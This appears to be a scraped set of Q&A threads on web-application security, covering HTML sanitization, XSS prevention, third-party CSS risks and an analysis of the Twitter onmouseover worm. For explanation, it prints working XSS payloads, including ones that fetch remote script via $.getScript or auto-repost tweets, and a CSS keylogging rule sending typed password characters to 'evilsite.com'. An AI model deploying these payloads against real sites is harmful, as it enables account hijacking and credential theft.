How to neutralize injected remote Ajax content?

How to neutralize injected remote Ajax content? - javascript

I'll be inserting content from remote sources into a web app. The sources should be limited/trusted, but there are still a couple of problems:
The remote sources could
1) be hacked and inject bad things
2) overwrite objects in my global names
space
3) I might eventually open it up for users to enter their own remote source. (It would be up to the user to not get in trouble, but I could still reduce the risk.)
So I want to neutralize any/all injected content just to be safe.
Here's my plan so far:
1) find and remove all inline event handlers
str.replace(/(<[^>]+\bon\w+\s*=\s*["']?)/gi,"$1return;"); // untested
Ex.
<a onclick="doSomethingBad()" ...
would become
<a onclick="return;doSomethingBad()" ...
2) remove all occurences of these tags:
script, embed, object, form, iframe, or applet
3) find all occurences of the word script within a tag
and replace the word script with html entities for it
str.replace(/(<[>+])(script)/gi,toHTMLEntitiesFunc);
would take care
<a href="javascript: ..."
4) lastly any src or href attribute that doesn't start with http, should have the domain name of the remote source prepended to it
My question: Am I missing anything else? Other things that I should definitely do or not do?
Edit: I have a feeling that responses are going to fall into a couple camps.
1) The "Don't do it!" response
Okay, if someone wants to be 100% safe, they need to disconnect the computer.
It's a balance between usability and safety.
There's nothing to stop a user from just going to a site directly and being exposed. If I open it up, it will be a user entering content at their own risk. They could just as easily enter a given URL into their address bar as in my form. So unless there's a particular risk to my server, I'm okay with those risks.
2) The "I'm aware of common exploits and you need to account for this ..." response ... or You can prevent another kind of attack by doing this ... or What about this attack ...?
I'm looking for the second type unless someone can provide specific reasons why my would be more dangerous than what the user can do on their own.

Instead of sanitizing (black listing). I'd suggest you setup a white list and ONLY allow those very specific things.
The reason for this is you will never, never, never catch all variations of malicious script. There's just too many of them.

don't forget to also include <frame> and <frameset> along with <iframe>

for the sanitization thing , are you looking for this?
if not, perhaps you could learn a few tips from this code snippet.
But, it must go without saying that prevention is better than cure. You had better allow only trusted sources, than allow all and then sanitize.
On a related note, you may want to take a look at this article, and its slashdot discussion.

It sounds like you want to do the following:
Insert snippets of static HTML into your web page
These snippets are requested via AJAX from a remote site.
You want to sanitise the HTML before injecting into the site, as this could lead to security problems like XSS.
If this is the case, then there are no easy ways to strip out 'bad' content in JavaScript. A whitelist solution is the best, but this can get very complex. I would suggest proxying requests for the remote content through your own server and sanitizing the HTML server side. There are various libraries that can do this. I would recommend either AntiSamy or HTMLPurifier.
For a completely browser-based way of doing this, you can use IE8's toStaticHTML method. However no other browser currently implements this.

Related

How to display an HTML email in a web application?

I wrote a web application that fetches email via IMAP. I now need to display these emails to the user.
I thought it would be simple (I am displaying HTML within an HTML-capable browser) until I looked into this a little... and discovered that there are tons of issues, such as:
Javascript & security
Style breaking
Surely more
Is there a good, safe way to display an HTML email? I would err for "safe" rather than "gorgeous", even though I don't want to display just the text version of an email (which is not even guaranteed to be there anyway...)
I realise the most obvious answer is "put everything in a frame" -- is that really it though? Will it actually work?
I am using Node server side if it helps...

..most obvious answer is "put everything in a frame"...will it actually work?
Yes, e.g. Whiteout Networks GmbH's WHITEOUT.IO does it in /src/tpl/read.html and /src/js/controller/read-sandbox.js. Some of the security issues are handled by DOMPurify
..there are tons of issues..Is there a good, safe way..?
I know the message data format also under names EML or MHTML so looking for a good "XY to HTML converter" or "HTML5 document viewer with XY support" may point you to a usable results (e.g. GroupDocs.Viewer)
Some e-mail clients (e.g. GMail) don't use iframe, instead they use a mail parser (e.g. andris9/mailparser) and a HTML parser (e.g. cheeriojs/cheerio) to extract an e-mail-safe-html subset (see Stack Overflow: What guidelines for HTML email design are there? and Stack Overflow: Styling html email for GMail for some examples) or use a HTML sanitizer (e.g. Google's Caja, cure53/DOMPurify) and embed the code directly into the page.
But it is not always an easy thing, there is no consensus on what constitutes the e-mail-safe-html subset and you certainly don't wont to inline possibly infected attachments nor run anonymous CORS scripts within the secured user's session.
Anyway, as always, studying source code of various e-mail clients (see Wikipedia: Comparison of email clients) is the way to find out..

Secure URL/application

I was reading this article
http://msdn.microsoft.com/en-us/magazine/hh708755.aspx
related to securing Asp.net Application, but one thing i am not able to understand like i am browing url http://www.abc.com/XSS.aspx?test=ok and if i replace it with http://www.abc.com/XSS.aspx?test=alert('hacked')... how the site is not safe or hacked?The point i am trying to make here is that it is not impacting or affecting the site?
The example i have mentioned above, is mentioned at many places whereever it discusses security,but didn't understand

Just imagine this if you are going to output the value of "test"(without escaping it properly for html usage) on your html page then one could possibly inject any javascript on your page !! Some possible exploits could be changing the background to something obscene or even redirecting your page to some scam websites .. in effect making you accessory to fraud of somekind !!
ALWAYS USE PROPER ESCAPING FOR STORING OR USING USER SUBMITTED INFORMATION!!
Edit: The escaping I am talking about will be useful so that people dont inject html or JS in your database. This would eventually lead to every user getting the injected HTML/JS (if the injected variable is same for everyone) on their page .. not just the user who injected it !!

div contenteditable, XSS

I currently have a simple <div contenteditable="true"> working, but, here's my problem.
Currently, the user can create a persistent XSS by inserting a <script> into the div, which I definitely do not want.
However, my current ideas to fix this are:
Allow only a and img tags
Use a textarea (not a good idea, because then have users copy and paste images)
What do you guys suggest?

You have to keep in mind that to prevent xss, you've GOT TO DO IT ON THE SERVER SIDE. If your rich text editor (ex YUI or tinyMCE) has some javascript to prevent a script tag from being inputted, that doesn't stop me from inspecting your http post requests, looking at the variable names you're using, and then using firefox poster to send whatever string I like to your server to bypass all client side validation. If you aren't validating user input SERVER SIDE then you're doing almost nothing productive to protect from XSS.
Any client side xss protection would have to do with how you render user input; not how you receive it. So, for example, if you encoded all input so it does not render as html. This goes away from what you want to accomplish though (just anchor and img tags). Just keep in mind the more you allow to be rendered the more possible vulnerabilities you expose.
That being said the bulk of your protection should come from the server side and there are a lot of XSS filters out there depending on what you're writing with (ex, asp.net or tomcat/derby/jboss) that you can look into.
I think you're on the right path by allowing ONLY a and img tags. The one thing you have to keep in mind is that you can put javascript commands into the src attributes of a tags, so take care to validate the href attributes. But the basic idea of "allow nothing and then change the filters to only allow certain things" (AKA whitelist filtering) is better than "allow everything and then filter out what I don't want" (AKA blacklist filtering).
In the comments below, Brian Nickel also said this which illustrates the point:
Everything but the elements and attributes you want to keep. I
know you mentioned it in your answer but that bears repeating since it
is so scary. <img onerror="stealMoney()">
The other thing you're going to want to do is define a XSSFilterRequest object (or something along those lines) and in a filter, override your requests so that any call to whatever your "getUrlParameter" and "getRequestParameter" objects run the request values through your xss filter. This provides a clean way to filter everything without rewriting existing code.
EDIT: A python example of xss filtering:
Python HTML sanitizer / scrubber / filter
Python library for XSS filtering?

What about using google caja (a source-to-source translator for securing Javascript-based web content)?
Unless you have xss validation on server side you could apply html_sanitize both to data sent from the user and data received from the server that is to be displayed. In worst case scenario you'll get XSSed content in database that will never be displayed to the user.

Is there any danger in loading external, third-party CSS?

My goal is to allow partners to style their landing pages with their own look and feel by passing us a link to their stylesheet in a URL parameter. Are there security or browser compatibility concerns with loading third-party CSS via JavaScript?

In CSS Files.
expressions(code), behavior:url(), url(javascript:code), and -moz-binding:url() all have potential security issues.
Behavior can't be cross domain so that removes some threat, but generally speaking you do need to sanitize it somehow.
If you allow the user to link to CSS on external servers, there isn't a fullproof way to validate. The server could check the CSS file on the server to ensure there is nothing malicious, but what if the user changes the stylesheet? You would have to continuously check the stylesheet. Also the server could potential feed different info to the servers ip address in attempt to bypass the validation method.
In all honesty I would advise storing the CSS on your own server. Simple run it throw a regex parser that removes the possible malicious code from above.

As long as you validate it somehow you should be good.
GOLDEN RULE: Do NOT trust the user

If the user is the only person with the ability to see their custom CSS, then there is not really any danger. They could ruin their own experience on your site, but not that of others.
However, if their custom CSS is displayed to other users, then they could potentially use it to completely mess up the styles of your site as you intended. For example, they could simply grab the id of some important elements from your source, and override them to hide them.
Of course, as long as you are careful and properly sanitize all user input, you should not face any major problems.

CSS expressions only work in IE 6-7, but allow inline JS to be used (generally to calculate a value to set).
For example:
/* set bgcolor based on time */
div.title {
background-color: expression( (new Date()).getHours() % 2 ? "#B8D4FF" : "#F08A00" );
}
however, this could potentially be used to do malicious things, i'd say it's at least worth some testing.

In the event that the 3rd party is hacked and attackers replace the benign css with evil css, you could be vulnerable to:
css exfiltration attacks*
targeted strikes that changes to the page's ui that change the meaning in a dangerous way. For example, adding an extra 1 before the dosage of a medicine, making it a fatal dose instead of a treatment. Or hiding the checkout button, making it harder to buy things on your site.
objectionable content or random advertisements, spam
legacy browsers running scripts via expressions(code), behavior:url(), url(javascript:code), and -moz-binding:url(). This is likely obsolete, but may still be relevant in rare cases.
any css attack yet to be developed (trusting 3rd party css opens you up to any and all future css zero-days if the 3rd party is attacked)
The bottom line
Loading 3rd party css is somewhat dangerous as you are increasing your attack surface in the event that the 3rd party is attacked. If possible, store a known, safe version of the 3rd party css on your own server and serve that (basically, convert it to 1st party).
*css exfiltration attack - see https://github.com/maxchehab/CSS-Keylogging. For example, this css will tell the attacker that a user has typed the character "a" in the password field.
input[type="password"][value$="a"] {
background-image: url("http://evilsite.com/a");
}
references: https://jakearchibald.com/2018/third-party-css-is-not-safe/
see also: https://security.stackexchange.com/questions/37832/css-based-attacks

Today's XSS onmouseover exploit on twitter.com

Can you explain what exactly happened on Twitter today? Basically the exploit was causing people to post a tweet containing this link:
http://t.co/#"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"/
Is this technically an XSS attack or something else?
Here is how the Twitter home page looked like: http://www.flickr.com/photos/travelist/6832853140/

The vulnerability is because URLs were not being parsed properly. For example, the following URL is posted to Twitter:
http://thisisatest.com/#"onmouseover="alert('test xss')"/
Twitter treats this as the URL. When it is parsed Twitter wraps a link around that code, so the HTML now looks like:
http://thisisatest.com/#"onmouseover="alert('test xss')"/</span>
You can see that by putting in the URL and the trailing slash, Twitter thinks it has a valid URL even though it contains a quote mark in it which allows it to escape (ie. terminate the href attribute, for the pedants out there) the URL attribute and include a mouse over. You can write anything to the page, including closing the link and including a script element. Also, you are not limited by the 140 character limit because you can use $.getScript().
This commit, if it were pulled, would have prevented this XSS vulnerability.
In detail, the offending regex was:
REGEXEN[:valid_url_path_chars] = /(?:
#{REGEXEN[:wikipedia_disambiguation]}|
#[^\/]+\/|
[\.\,]?#{REGEXEN[:valid_general_url_path_chars]}
)/ix
The #[^\/]+\/ part allowed any character (except a forward slash) when it was prefixed by an # sign and suffixed by a forward slash.
By changing to ##{REGEXEN[:valid_general_url_path_chars]}+\/ it now only allows valid URL characters.

Yes this is XSS, it is attacking a javascript event handler. What is cool about this XSS is that it doesn't require <> to exploit. The injected string is: size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')".
The size::999999999999px makes it very large and there for more likly that someone will mouse over it. The real problem is the onmouseover= event handler.
To prevent this in PHP you need to convert quote marks into their html entities:
$var=htmlspecialchars($var,ENT_QUOTES);
This is because HTML you cannot escape quotes like sql: \'

The exploit was a classic piece of Javascript injection. Suppose you write a tweet with the following text:
"http://www.guardian.co.uk/technology is the best!"
When you view the Twitter web page, that becomes a link, like so:
<a href="http://www.guardian.co.uk/technology" class="tweet-url web"
rel="nofollow">http://www.guardian.co.uk/technology</a> is the best!
The exploit attacked that link-making function. The raw text of the exploit tweet would read something like this:
http://a.no/#";onmouseover=";$('textarea:first').val(this.innerHTML);
$('.status-update-form').submit();"class="modal-overlay"/
Which Twitter didn't protect properly, probably because the #" character combination broke their [HTML] parser. That link would generate the following page source:
<a href="http://a.no/#";onmouseover=";$('textarea:first').val(this.innerHTML);
$('.status-update-form').submit();"class="modal-overlay"/ class="tweet-url web"
rel="nofollow">
This means that executable content (the onMouseOver="stuff" bit) has ended up in the page source code. Not knowing any better, the browser runs this code. Because it's running in the user's browser, it can do anything the user does; most variations used this power to re-post the content, which is why it spread like a virus. To encourage the user to activate the code by mousing over, they also formatted the block as black-on-black using CSS [Cascading Style Sheets, which determines the page layout]. Other versions were hacked around by users to have all sorts of other effects, such as porn site redirects, rainbow text in their tweets, and so forth. Some of them popped up dialog boxes designed to alarm the users, talking about accounts being disabled or passwords stolen (they weren't, in either case).
Twitter fixed this not by blocking the string onMouseOver (which some dim-witted blogs were calling for) but by properly sanitising the input. The " marks in these tweets are now turned into " – the HTML-escaped form.
Technically this is a second-order injection attack; the attack string is inserted into the database and handled correctly, but then the attack takes place as the string is read back out instead. It's not that complex an attack at all either - rather embarrassing for Twitter that they were caught out by this.
Source: The Twitter hack: how it started and how it worked

It's an XSS exploit. As Twitter admitted in their update. You can prevent attacks like that by never allowing users to post javascript code. You should always filter it out. More information about avoiding XSS can be found here: http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

From Wikipedia: "Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users."
Today's attack fits the bill to me.
Basically there was some sort of parsing error with Twitter.com display code. When they converted URLs to HTML hyperlinks, they weren't handling # characters correctly and this was causing javascript events to be inserted into the HTML link.

We Keep Coding

JavaScript is the programming language of the Web.